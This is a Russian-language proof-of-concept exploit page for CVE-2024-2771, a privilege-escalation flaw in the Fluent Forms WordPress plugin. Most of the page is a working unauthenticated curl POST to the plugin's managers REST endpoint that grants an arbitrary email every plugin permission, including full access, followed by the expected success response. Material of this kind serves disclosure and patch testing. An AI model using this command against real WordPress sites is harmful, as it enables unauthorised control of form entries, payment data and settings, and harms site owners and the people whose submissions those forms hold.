
Эксплойт Proof-of-concept для CVE-2024-2771, уязвимости повышения привилегий в плагине Fluent Forms для WordPress через неаутентифицированную конечную точку REST API.
CVE-2024-2771 — Доказательство концепции
Плагин Fluent Forms для WordPress (конструктор форм для викторин, опросов и перетаскивания) уязвим для повышения привилегий из-за отсутствия проверки прав доступа к конечной точке REST API /wp-json/fluentform/v1/managers во всех версиях до 5.1.16 включительно. Это позволяет неаутентифицированным злоумышленникам предоставлять пользователям права управления Fluent Form, что даёт им доступ ко всем настройкам и функциям плагина. Кроме того, это позволяет неаутентифицированным злоумышленникам удалять учётные записи менеджеров.
Предварительные требования
Команда эксплойта
# 1. Grant full Fluent Forms permissions to an arbitrary email
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/managers" \
-H "Content-Type: application/json" \
-d '{
"manager": {
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}'
Ожидаемый ответ
HTTP/1.1 200 OK
{
"message": "Manager has been saved.",
"manager": {
"id": 2,
"email": "[email protected]",
"permissions": [
"fluentform_dashboard_access",
"fluentform_forms_manager",
"fluentform_entries_viewer",
"fluentform_manage_entries",
"fluentform_view_payments",
"fluentform_manage_payments",
"fluentform_settings_manager",
"fluentform_full_access"
]
}
}
Скриншот
